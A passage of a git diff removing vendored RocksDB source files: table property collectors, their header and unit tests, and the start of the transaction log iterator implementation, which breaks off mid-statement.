-InternalKeyPropertiesCollector::GetReadableProperties() const {
-  return {{"kDeletedKeys", ToString(deleted_keys_)},
-          {"kMergeOperands", ToString(merge_operands_)}};
-}
-
-namespace {
-
-EntryType GetEntryType(ValueType value_type) {
-  switch (value_type) {
-    case kTypeValue:
-      return kEntryPut;
-    case kTypeDeletion:
-      return kEntryDelete;
-    case kTypeSingleDeletion:
-      return kEntrySingleDelete;
-    case kTypeMerge:
-      return kEntryMerge;
-    default:
-      return kEntryOther;
-  }
-}
-
-uint64_t GetUint64Property(const UserCollectedProperties& props,
-                           const std::string property_name,
-                           bool* property_present) {
-  auto pos = props.find(property_name);
-  if (pos == props.end()) {
-    *property_present = false;
-    return 0;
-  }
-  Slice raw = pos->second;
-  uint64_t val = 0;
-  *property_present = true;
-  return GetVarint64(&raw, &val) ? val : 0;
-}
-
-}  // namespace
-
-Status UserKeyTablePropertiesCollector::InternalAdd(const Slice& key,
-                                                    const Slice& value,
-                                                    uint64_t file_size) {
-  ParsedInternalKey ikey;
-  if (!ParseInternalKey(key, &ikey)) {
-    return Status::InvalidArgument("Invalid internal key");
-  }
-
-  return collector_->AddUserKey(ikey.user_key, value, GetEntryType(ikey.type),
-                                ikey.sequence, file_size);
-}
-
-Status UserKeyTablePropertiesCollector::Finish(
-    UserCollectedProperties* properties) {
-  return collector_->Finish(properties);
-}
-
-UserCollectedProperties
-UserKeyTablePropertiesCollector::GetReadableProperties() const {
-  return collector_->GetReadableProperties();
-}
-
-
-const std::string InternalKeyTablePropertiesNames::kDeletedKeys
-  = "rocksdb.deleted.keys";
-const std::string InternalKeyTablePropertiesNames::kMergeOperands =
-    "rocksdb.merge.operands";
-
-uint64_t GetDeletedKeys(
-    const UserCollectedProperties& props) {
-  bool property_present_ignored;
-  return GetUint64Property(props, InternalKeyTablePropertiesNames::kDeletedKeys,
-                           &property_present_ignored);
-}
-
-uint64_t GetMergeOperands(const UserCollectedProperties& props,
-                          bool* property_present) {
-  return GetUint64Property(
-      props, InternalKeyTablePropertiesNames::kMergeOperands, property_present);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_properties_collector.h b/thirdparty/rocksdb/db/table_properties_collector.h
deleted file mode 100644
index d8cd756..0000000
--- a/thirdparty/rocksdb/db/table_properties_collector.h
+++ /dev/null
@@ -1,137 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file defines a collection of statistics collectors.
-#pragma once
-
-#include "rocksdb/table_properties.h"
-
-#include <memory>
-#include <string>
-#include <vector>
-
-namespace rocksdb {
-
-struct InternalKeyTablePropertiesNames {
-  static const std::string kDeletedKeys;
-  static const std::string kMergeOperands;
-};
-
-// Base class for internal table properties collector.
-class IntTblPropCollector {
- public:
-  virtual ~IntTblPropCollector() {}
-  virtual Status Finish(UserCollectedProperties* properties) = 0;
-
-  virtual const char* Name() const = 0;
-
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) = 0;
-
-  virtual UserCollectedProperties GetReadableProperties() const = 0;
-
-  virtual bool NeedCompact() const { return false; }
-};
-
-// Factory for internal table properties collector.
-class IntTblPropCollectorFactory {
- public:
-  virtual ~IntTblPropCollectorFactory() {}
-  // has to be thread-safe
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) = 0;
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const = 0;
-};
-
-// Collecting the statistics for internal keys. Visible only by internal
-// rocksdb modules.
-class InternalKeyPropertiesCollector : public IntTblPropCollector {
- public:
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override;
-
-  virtual Status Finish(UserCollectedProperties* properties) override;
-
-  virtual const char* Name() const override {
-    return "InternalKeyPropertiesCollector";
-  }
-
-  UserCollectedProperties GetReadableProperties() const override;
-
- private:
-  uint64_t deleted_keys_ = 0;
-  uint64_t merge_operands_ = 0;
-};
-
-class InternalKeyPropertiesCollectorFactory
-    : public IntTblPropCollectorFactory {
- public:
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    return new InternalKeyPropertiesCollector();
-  }
-
-  virtual const char* Name() const override {
-    return "InternalKeyPropertiesCollectorFactory";
-  }
-};
-
-// When rocksdb creates a new table, it will encode all "user keys" into
-// "internal keys", which contains meta information of a given entry.
-//
-// This class extracts user key from the encoded internal key when Add() is
-// invoked.
-class UserKeyTablePropertiesCollector : public IntTblPropCollector {
- public:
-  // transfer of ownership
-  explicit UserKeyTablePropertiesCollector(TablePropertiesCollector* collector)
-      : collector_(collector) {}
-
-  virtual ~UserKeyTablePropertiesCollector() {}
-
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override;
-
-  virtual Status Finish(UserCollectedProperties* properties) override;
-
-  virtual const char* Name() const override { return collector_->Name(); }
-
-  UserCollectedProperties GetReadableProperties() const override;
-
-  virtual bool NeedCompact() const override {
-    return collector_->NeedCompact();
-  }
-
- protected:
-  std::unique_ptr<TablePropertiesCollector> collector_;
-};
-
-class UserKeyTablePropertiesCollectorFactory
-    : public IntTblPropCollectorFactory {
- public:
-  explicit UserKeyTablePropertiesCollectorFactory(
-      std::shared_ptr<TablePropertiesCollectorFactory> user_collector_factory)
-      : user_collector_factory_(user_collector_factory) {}
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    TablePropertiesCollectorFactory::Context context;
-    context.column_family_id = column_family_id;
-    return new UserKeyTablePropertiesCollector(
-        user_collector_factory_->CreateTablePropertiesCollector(context));
-  }
-
-  virtual const char* Name() const override {
-    return user_collector_factory_->Name();
-  }
-
- private:
-  std::shared_ptr<TablePropertiesCollectorFactory> user_collector_factory_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_properties_collector_test.cc b/thirdparty/rocksdb/db/table_properties_collector_test.cc
deleted file mode 100644
index 66c66c0..0000000
--- a/thirdparty/rocksdb/db/table_properties_collector_test.cc
+++ /dev/null
@@ -1,499 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <map>
-#include <memory>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/table_properties_collector.h"
-#include "options/cf_options.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/table_builder.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class TablePropertiesTest : public testing::Test,
-                            public testing::WithParamInterface<bool> {
- public:
-  virtual void SetUp() override { backward_mode_ = GetParam(); }
-
-  bool backward_mode_;
-};
-
-// Utilities test functions
-namespace {
-static const uint32_t kTestColumnFamilyId = 66;
-static const std::string kTestColumnFamilyName = "test_column_fam";
-
-void MakeBuilder(const Options& options, const ImmutableCFOptions& ioptions,
-                 const InternalKeyComparator& internal_comparator,
-                 const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-                     int_tbl_prop_collector_factories,
-                 std::unique_ptr<WritableFileWriter>* writable,
-                 std::unique_ptr<TableBuilder>* builder) {
-  unique_ptr<WritableFile> wf(new test::StringSink);
-  writable->reset(new WritableFileWriter(std::move(wf), EnvOptions()));
-  int unknown_level = -1;
-  builder->reset(NewTableBuilder(
-      ioptions, internal_comparator, int_tbl_prop_collector_factories,
-      kTestColumnFamilyId, kTestColumnFamilyName,
-      writable->get(), options.compression, options.compression_opts,
-      unknown_level));
-}
-}  // namespace
-
-// Collects keys that starts with "A" in a table.
-class RegularKeysStartWithA: public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-     std::string encoded;
-     std::string encoded_num_puts;
-     std::string encoded_num_deletes;
-     std::string encoded_num_single_deletes;
-     std::string encoded_num_size_changes;
-     PutVarint32(&encoded, count_);
-     PutVarint32(&encoded_num_puts, num_puts_);
-     PutVarint32(&encoded_num_deletes, num_deletes_);
-     PutVarint32(&encoded_num_single_deletes, num_single_deletes_);
-     PutVarint32(&encoded_num_size_changes, num_size_changes_);
-     *properties = UserCollectedProperties{
-         {"TablePropertiesTest", message_},
-         {"Count", encoded},
-         {"NumPuts", encoded_num_puts},
-         {"NumDeletes", encoded_num_deletes},
-         {"NumSingleDeletes", encoded_num_single_deletes},
-         {"NumSizeChanges", encoded_num_size_changes},
-     };
-     return Status::OK();
-  }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    // simply asssume all user keys are not empty.
-    if (user_key.data()[0] == 'A') {
-      ++count_;
-    }
-    if (type == kEntryPut) {
-      num_puts_++;
-    } else if (type == kEntryDelete) {
-      num_deletes_++;
-    } else if (type == kEntrySingleDelete) {
-      num_single_deletes_++;
-    }
-    if (file_size < file_size_) {
-      message_ = "File size should not decrease.";
-    } else if (file_size != file_size_) {
-      num_size_changes_++;
-    }
-
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  std::string message_ = "Rocksdb";
-  uint32_t count_ = 0;
-  uint32_t num_puts_ = 0;
-  uint32_t num_deletes_ = 0;
-  uint32_t num_single_deletes_ = 0;
-  uint32_t num_size_changes_ = 0;
-  uint64_t file_size_ = 0;
-};
-
-// Collects keys that starts with "A" in a table. Backward compatible mode
-// It is also used to test internal key table property collector
-class RegularKeysStartWithABackwardCompatible
-    : public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    std::string encoded;
-    PutVarint32(&encoded, count_);
-    *properties = UserCollectedProperties{{"TablePropertiesTest", "Rocksdb"},
-                                          {"Count", encoded}};
-    return Status::OK();
-  }
-
-  Status Add(const Slice& user_key, const Slice& value) override {
-    // simply asssume all user keys are not empty.
-    if (user_key.data()[0] == 'A') {
-      ++count_;
-    }
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  uint32_t count_ = 0;
-};
-
-class RegularKeysStartWithAInternal : public IntTblPropCollector {
- public:
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    std::string encoded;
-    PutVarint32(&encoded, count_);
-    *properties = UserCollectedProperties{{"TablePropertiesTest", "Rocksdb"},
-                                          {"Count", encoded}};
-    return Status::OK();
-  }
-
-  Status InternalAdd(const Slice& user_key, const Slice& value,
-                     uint64_t file_size) override {
-    // simply asssume all user keys are not empty.
-    if (user_key.data()[0] == 'A') {
-      ++count_;
-    }
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  uint32_t count_ = 0;
-};
-
-class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory,
-                                     public TablePropertiesCollectorFactory {
- public:
-  explicit RegularKeysStartWithAFactory(bool backward_mode)
-      : backward_mode_(backward_mode) {}
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    EXPECT_EQ(kTestColumnFamilyId, context.column_family_id);
-    if (!backward_mode_) {
-      return new RegularKeysStartWithA();
-    } else {
-      return new RegularKeysStartWithABackwardCompatible();
-    }
-  }
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    return new RegularKeysStartWithAInternal();
-  }
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  bool backward_mode_;
-};
-
-class FlushBlockEveryThreePolicy : public FlushBlockPolicy {
- public:
-  virtual bool Update(const Slice& key, const Slice& value) override {
-    return (++count_ % 3U == 0);
-  }
-
- private:
-  uint64_t count_ = 0;
-};
-
-class FlushBlockEveryThreePolicyFactory : public FlushBlockPolicyFactory {
- public:
-  explicit FlushBlockEveryThreePolicyFactory() {}
-
-  const char* Name() const override {
-    return "FlushBlockEveryThreePolicyFactory";
-  }
-
-  FlushBlockPolicy* NewFlushBlockPolicy(
-      const BlockBasedTableOptions& table_options,
-      const BlockBuilder& data_block_builder) const override {
-    return new FlushBlockEveryThreePolicy;
-  }
-};
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-namespace {
-void TestCustomizedTablePropertiesCollector(
-    bool backward_mode, uint64_t magic_number, bool test_int_tbl_prop_collector,
-    const Options& options, const InternalKeyComparator& internal_comparator) {
-  // make sure the entries will be inserted with order.
-  std::map<std::pair<std::string, ValueType>, std::string> kvs = {
-      {{"About   ", kTypeValue}, "val5"},  // starts with 'A'
-      {{"Abstract", kTypeValue}, "val2"},  // starts with 'A'
-      {{"Around  ", kTypeValue}, "val7"},  // starts with 'A'
-      {{"Beyond  ", kTypeValue}, "val3"},
-      {{"Builder ", kTypeValue}, "val1"},
-      {{"Love    ", kTypeDeletion}, ""},
-      {{"Cancel  ", kTypeValue}, "val4"},
-      {{"Find    ", kTypeValue}, "val6"},
-      {{"Rocks   ", kTypeDeletion}, ""},
-      {{"Foo     ", kTypeSingleDeletion}, ""},
-  };
-
-  // -- Step 1: build table
-  std::unique_ptr<TableBuilder> builder;
-  std::unique_ptr<WritableFileWriter> writer;
-  const ImmutableCFOptions ioptions(options);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  if (test_int_tbl_prop_collector) {
-    int_tbl_prop_collector_factories.emplace_back(
-        new RegularKeysStartWithAFactory(backward_mode));
-  } else {
-    GetIntTblPropCollectorFactory(ioptions, &int_tbl_prop_collector_factories);
-  }
-  MakeBuilder(options, ioptions, internal_comparator,
-              &int_tbl_prop_collector_factories, &writer, &builder);
-
-  SequenceNumber seqNum = 0U;
-  for (const auto& kv : kvs) {
-    InternalKey ikey(kv.first.first, seqNum++, kv.first.second);
-    builder->Add(ikey.Encode(), kv.second);
-  }
-  ASSERT_OK(builder->Finish());
-  writer->Flush();
-
-  // -- Step 2: Read properties
-  test::StringSink* fwf =
-      static_cast<test::StringSink*>(writer->writable_file());
-  std::unique_ptr<RandomAccessFileReader> fake_file_reader(
-      test::GetRandomAccessFileReader(
-          new test::StringSource(fwf->contents())));
-  TableProperties* props;
-  Status s = ReadTableProperties(fake_file_reader.get(), fwf->contents().size(),
-                                 magic_number, ioptions, &props);
-  std::unique_ptr<TableProperties> props_guard(props);
-  ASSERT_OK(s);
-
-  auto user_collected = props->user_collected_properties;
-
-  ASSERT_NE(user_collected.find("TablePropertiesTest"), user_collected.end());
-  ASSERT_EQ("Rocksdb", user_collected.at("TablePropertiesTest"));
-
-  uint32_t starts_with_A = 0;
-  ASSERT_NE(user_collected.find("Count"), user_collected.end());
-  Slice key(user_collected.at("Count"));
-  ASSERT_TRUE(GetVarint32(&key, &starts_with_A));
-  ASSERT_EQ(3u, starts_with_A);
-
-  if (!backward_mode && !test_int_tbl_prop_collector) {
-    uint32_t num_puts;
-    ASSERT_NE(user_collected.find("NumPuts"), user_collected.end());
-    Slice key_puts(user_collected.at("NumPuts"));
-    ASSERT_TRUE(GetVarint32(&key_puts, &num_puts));
-    ASSERT_EQ(7u, num_puts);
-
-    uint32_t num_deletes;
-    ASSERT_NE(user_collected.find("NumDeletes"), user_collected.end());
-    Slice key_deletes(user_collected.at("NumDeletes"));
-    ASSERT_TRUE(GetVarint32(&key_deletes, &num_deletes));
-    ASSERT_EQ(2u, num_deletes);
-
-    uint32_t num_single_deletes;
-    ASSERT_NE(user_collected.find("NumSingleDeletes"), user_collected.end());
-    Slice key_single_deletes(user_collected.at("NumSingleDeletes"));
-    ASSERT_TRUE(GetVarint32(&key_single_deletes, &num_single_deletes));
-    ASSERT_EQ(1u, num_single_deletes);
-
-    uint32_t num_size_changes;
-    ASSERT_NE(user_collected.find("NumSizeChanges"), user_collected.end());
-    Slice key_size_changes(user_collected.at("NumSizeChanges"));
-    ASSERT_TRUE(GetVarint32(&key_size_changes, &num_size_changes));
-    ASSERT_GE(num_size_changes, 2u);
-  }
-}
-}  // namespace
-
-TEST_P(TablePropertiesTest, CustomizedTablePropertiesCollector) {
-  // Test properties collectors with internal keys or regular keys
-  // for block based table
-  for (bool encode_as_internal : { true, false }) {
-    Options options;
-    BlockBasedTableOptions table_options;
-    table_options.flush_block_policy_factory =
-        std::make_shared<FlushBlockEveryThreePolicyFactory>();
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    test::PlainInternalKeyComparator ikc(options.comparator);
-    std::shared_ptr<TablePropertiesCollectorFactory> collector_factory(
-        new RegularKeysStartWithAFactory(backward_mode_));
-    options.table_properties_collector_factories.resize(1);
-    options.table_properties_collector_factories[0] = collector_factory;
-
-    TestCustomizedTablePropertiesCollector(backward_mode_,
-                                           kBlockBasedTableMagicNumber,
-                                           encode_as_internal, options, ikc);
-
-#ifndef ROCKSDB_LITE  // PlainTable is not supported in Lite
-    // test plain table
-    PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = 8;
-    plain_table_options.bloom_bits_per_key = 8;
-    plain_table_options.hash_table_ratio = 0;
-
-    options.table_factory =
-        std::make_shared<PlainTableFactory>(plain_table_options);
-    TestCustomizedTablePropertiesCollector(backward_mode_,
-                                           kPlainTableMagicNumber,
-                                           encode_as_internal, options, ikc);
-#endif  // !ROCKSDB_LITE
-  }
-}
-
-namespace {
-void TestInternalKeyPropertiesCollector(
-    bool backward_mode, uint64_t magic_number, bool sanitized,
-    std::shared_ptr<TableFactory> table_factory) {
-  InternalKey keys[] = {
-      InternalKey("A       ", 0, ValueType::kTypeValue),
-      InternalKey("B       ", 1, ValueType::kTypeValue),
-      InternalKey("C       ", 2, ValueType::kTypeValue),
-      InternalKey("W       ", 3, ValueType::kTypeDeletion),
-      InternalKey("X       ", 4, ValueType::kTypeDeletion),
-      InternalKey("Y       ", 5, ValueType::kTypeDeletion),
-      InternalKey("Z       ", 6, ValueType::kTypeDeletion),
-      InternalKey("a       ", 7, ValueType::kTypeSingleDeletion),
-      InternalKey("b       ", 8, ValueType::kTypeMerge),
-      InternalKey("c       ", 9, ValueType::kTypeMerge),
-  };
-
-  std::unique_ptr<TableBuilder> builder;
-  std::unique_ptr<WritableFileWriter> writable;
-  Options options;
-  test::PlainInternalKeyComparator pikc(options.comparator);
-
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  options.table_factory = table_factory;
-  if (sanitized) {
-    options.table_properties_collector_factories.emplace_back(
-        new RegularKeysStartWithAFactory(backward_mode));
-    // with sanitization, even regular properties collector will be able to
-    // handle internal keys.
-    auto comparator = options.comparator;
-    // HACK: Set options.info_log to avoid writing log in
-    // SanitizeOptions().
-    options.info_log = std::make_shared<test::NullLogger>();
-    options = SanitizeOptions("db",            // just a place holder
-                              options);
-    ImmutableCFOptions ioptions(options);
-    GetIntTblPropCollectorFactory(ioptions, &int_tbl_prop_collector_factories);
-    options.comparator = comparator;
-  } else {
-    int_tbl_prop_collector_factories.emplace_back(
-        new InternalKeyPropertiesCollectorFactory);
-  }
-  const ImmutableCFOptions ioptions(options);
-
-  for (int iter = 0; iter < 2; ++iter) {
-    MakeBuilder(options, ioptions, pikc, &int_tbl_prop_collector_factories,
-                &writable, &builder);
-    for (const auto& k : keys) {
-      builder->Add(k.Encode(), "val");
-    }
-
-    ASSERT_OK(builder->Finish());
-    writable->Flush();
-
-    test::StringSink* fwf =
-        static_cast<test::StringSink*>(writable->writable_file());
-    unique_ptr<RandomAccessFileReader> reader(test::GetRandomAccessFileReader(
-        new test::StringSource(fwf->contents())));
-    TableProperties* props;
-    Status s =
-        ReadTableProperties(reader.get(), fwf->contents().size(), magic_number,
-                            ioptions, &props);
-    ASSERT_OK(s);
-
-    std::unique_ptr<TableProperties> props_guard(props);
-    auto user_collected = props->user_collected_properties;
-    uint64_t deleted = GetDeletedKeys(user_collected);
-    ASSERT_EQ(5u, deleted);  // deletes + single-deletes
-
-    bool property_present;
-    uint64_t merges = GetMergeOperands(user_collected, &property_present);
-    ASSERT_TRUE(property_present);
-    ASSERT_EQ(2u, merges);
-
-    if (sanitized) {
-      uint32_t starts_with_A = 0;
-      ASSERT_NE(user_collected.find("Count"), user_collected.end());
-      Slice key(user_collected.at("Count"));
-      ASSERT_TRUE(GetVarint32(&key, &starts_with_A));
-      ASSERT_EQ(1u, starts_with_A);
-
-      if (!backward_mode) {
-        uint32_t num_puts;
-        ASSERT_NE(user_collected.find("NumPuts"), user_collected.end());
-        Slice key_puts(user_collected.at("NumPuts"));
-        ASSERT_TRUE(GetVarint32(&key_puts, &num_puts));
-        ASSERT_EQ(3u, num_puts);
-
-        uint32_t num_deletes;
-        ASSERT_NE(user_collected.find("NumDeletes"), user_collected.end());
-        Slice key_deletes(user_collected.at("NumDeletes"));
-        ASSERT_TRUE(GetVarint32(&key_deletes, &num_deletes));
-        ASSERT_EQ(4u, num_deletes);
-
-        uint32_t num_single_deletes;
-        ASSERT_NE(user_collected.find("NumSingleDeletes"),
-                  user_collected.end());
-        Slice key_single_deletes(user_collected.at("NumSingleDeletes"));
-        ASSERT_TRUE(GetVarint32(&key_single_deletes, &num_single_deletes));
-        ASSERT_EQ(1u, num_single_deletes);
-      }
-    }
-  }
-}
-}  // namespace
-
-TEST_P(TablePropertiesTest, InternalKeyPropertiesCollector) {
-  TestInternalKeyPropertiesCollector(
-      backward_mode_, kBlockBasedTableMagicNumber, true /* sanitize */,
-      std::make_shared<BlockBasedTableFactory>());
-  if (backward_mode_) {
-    TestInternalKeyPropertiesCollector(
-        backward_mode_, kBlockBasedTableMagicNumber, false /* not sanitize */,
-        std::make_shared<BlockBasedTableFactory>());
-  }
-
-#ifndef ROCKSDB_LITE  // PlainTable is not supported in Lite
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 8;
-  plain_table_options.bloom_bits_per_key = 8;
-  plain_table_options.hash_table_ratio = 0;
-
-  TestInternalKeyPropertiesCollector(
-      backward_mode_, kPlainTableMagicNumber, false /* not sanitize */,
-      std::make_shared<PlainTableFactory>(plain_table_options));
-#endif  // !ROCKSDB_LITE
-}
-
-INSTANTIATE_TEST_CASE_P(InternalKeyPropertiesCollector, TablePropertiesTest,
-                        ::testing::Bool());
-
-INSTANTIATE_TEST_CASE_P(CustomizedTablePropertiesCollector, TablePropertiesTest,
-                        ::testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/transaction_log_impl.cc b/thirdparty/rocksdb/db/transaction_log_impl.cc
deleted file mode 100644
index e22c0c4..0000000
--- a/thirdparty/rocksdb/db/transaction_log_impl.cc
+++ /dev/null
@@ -1,272 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "db/transaction_log_impl.h"
-#include <inttypes.h>
-#include "db/write_batch_internal.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-TransactionLogIteratorImpl::TransactionLogIteratorImpl(
-    const std::string& dir, const ImmutableDBOptions* options,
-    const TransactionLogIterator::ReadOptions& read_options,
-    const EnvOptions& soptions, const SequenceNumber seq,
-    std::unique_ptr<VectorLogPtr> files, VersionSet const* const versions)
-    : dir_(dir),
-      options_(options),
-      read_options_(read_options),
-      soptions_(soptions),
-      startingSequenceNumber_(seq),
-      files_(std::move(files)),
-      started_(false),
-      isValid_(false),
-      currentFileIndex_(0),
-      currentBatchSeq_(0),
-      currentLastSeq_(0),
-      versions_(versions) {
-  assert(files_ != nullptr);
-  assert(versions_ != nullptr);
-
-  reporter_.env = options_->env;
-  reporter_.info_log = options_->info_log.get();
-  SeekToStartSequence(); // Seek till starting sequence
-}
-
-Status TransactionLogIteratorImpl::OpenLogFile(
-    const LogFile* logFile, unique_ptr<SequentialFileReader>* file_reader) {
-  Env* env = options_->env;
-  unique_ptr<SequentialFile> file;
-  Status s;
-  EnvOptions optimized_env_options = env->OptimizeForLogRead(soptions_);
-  if (logFile->Type() == kArchivedLogFile) {
-    std::string fname = ArchivedLogFileName(dir_, logFile->LogNumber());
-    s = env->NewSequentialFile(fname, &file, optimized_env_options);
-  } else {
-    std::string fname = LogFileName(dir_, logFile->LogNumber());
-    s = env->NewSequentialFile(fname, &file, optimized_env_options);
-    if (!s.ok()) {
-      //  If cannot open file in DB directory.
-      //  Try the archive dir, as it could have moved in the meanwhile.
-      fname = ArchivedLogFileName(dir_, logFile->LogNumber());
-      s = env->NewSequentialFile(fname, &file, optimized_env_options);
-    }
-  }
-  if (s.ok()) {
-    file_reader->reset(new SequentialFileReader(std::move(file)));
-  }
-  return s;
-}
-
-BatchResult TransactionLogIteratorImpl::GetBatch()  {
-  assert(isValid_);  //  cannot call in a non valid state.
-  BatchResult result;
-  result.sequence = currentBatchSeq_;
-  result.writeBatchPtr = std::move(currentBatch_);
-  return result;
-}
-
-Status TransactionLogIteratorImpl::status() {
-  return currentStatus_;
-}
-
-bool TransactionLogIteratorImpl::Valid() {
-  return started_ && isValid_;
-}
-
-bool TransactionLogIteratorImpl::RestrictedRead(
-    Slice* record,
-    std::string* scratch) {
-  // Don't read if no more complete entries to read from logs
-  if (currentLastSeq_ >= versions_->LastSequence()) {
-    return false;
-  }
-  return currentLogReader_->ReadRecord(record, scratch);
-}
-
-void TransactionLogIteratorImpl::SeekToStartSequence(
-    uint64_t startFileIndex,
-    bool strict) {
-  std::string scratch;
-  Slice record;
-  started_ = false;
-  isValid_ = false;
-  if (files_->size() <= startFileIndex) {
-    return;
-  }
-  Status s = OpenLogReader(files_->at(startFileIndex).get());
-  if (!s.ok()) {
-    currentStatus_ = s;
-    reporter_.Info(currentStatus_.ToString().c_str());
-    return;
-  }
-  while (RestrictedRead(&record, &scratch)) {
-    if (record.size() < WriteBatchInternal::kHeader) {
-      reporter_.Corruption(
-        record.size(), Status::Corruption("very small log record"));
-      continue;
-    }
-    UpdateCurrentWriteBatch(record);
-    if (currentLastSeq_ >= startingSequenceNumber_) {
-      if (strict && currentBatchSeq_ != startingSequenceNumber_) {
-        currentStatus_ = Status::Corruption("Gap in sequence number. Could not "
-                                            "seek to required sequence number");
-        reporter_.Info(currentStatus_.ToString().c_str());
-        return;
-      } else if (strict) {
-        reporter_.Info("Could seek required sequence number. Iterator will "
-                       "continue.");
-      }
-      isValid_ = true;
-      started_ = true; // set started_ as we could seek till starting sequence
-      return;
-    } else {
-      isValid_ = false;
-    }
-  }
-
-  // Could not find start sequence in first file. Normally this must be the
-  // only file. Otherwise log the error and let the iterator return next entry
-  // If strict is set, we want to seek exactly till the start sequence and it
-  // should have been present in the file we scanned above
-  if (strict) {
-    currentStatus_ = Status::Corruption("Gap in sequence number. Could not "
-                                        "seek to required sequence number");
-    reporter_.Info(currentStatus_.ToString().c_str());
-  } else if (files_->size() != 1) {
-    currentStatus_ = Status::Corruption("Start sequence was not found, "
-                                        "skipping to the next available");
-    reporter_.Info(currentStatus_.ToString().c_str());
-    // Let NextImpl find the next available entry. started_ remains false
-    // because we don't want to check for gaps while moving to start sequence
-    NextImpl(true);
-  }
-}
-
-void TransactionLogIteratorImpl::Next() {
-  return NextImpl(false);
-}
-
-void TransactionLogIteratorImpl::NextImpl(bool internal) {
-  std::string scratch;
-  Slice record;
-  isValid_ = false;
-  if (!internal && !started_) {
-    // Runs every time until we can seek to the start sequence
-    return SeekToStartSequence();
-  }
-  while(true) {
-    assert(currentLogReader_);
-    if (currentLogReader_->IsEOF()) {
-      currentLogReader_->UnmarkEOF();
-    }
-    while (RestrictedRead(&record, &scratch)) {
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter_.Corruption(
-          record.size(), Status::Corruption("very small log record"));
-        continue;
-      } else {
-        // started_ should be true if called by application
-        assert(internal || started_);
-        // started_ should be false if called internally
-        assert(!internal || !started_);
-        UpdateCurrentWriteBatch(record);
-        if (internal && !started_) {
-          started_ = true;
-        }
-        return;
-      }
-    }
-
-    // Open the next file
-    if (currentFileIndex_ < files_->size() - 1) {
-      ++currentFileIndex_;
-      Status s = OpenLogReader(files_->at(currentFileIndex_).get());
-      if (!s.ok()) {
-        isValid_ = false;
-        currentStatus_ = s;
-        return;
-      }
-    } else {
-      isValid_ = false;
-      if (currentLastSeq_ == versions_->LastSequence()) {
-        currentStatus_ = Status::OK();
-      } else {
-        currentStatus_ = Status::Corruption("NO MORE DATA LEFT");
-      }
-      return;
-    }
-  }
-}
-
-bool TransactionLogIteratorImpl::IsBatchExpected(
-    const WriteBatch* batch,
-    const SequenceNumber expectedSeq) {
-  assert(batch);
-  SequenceNumber batchSeq = WriteBatchInternal::Sequence(batch);
-  if (batchSeq != expectedSeq) {
-    char buf[200];
-    snprintf(buf, sizeof(buf),
-             "Discontinuity in log records. Got seq=%" PRIu64
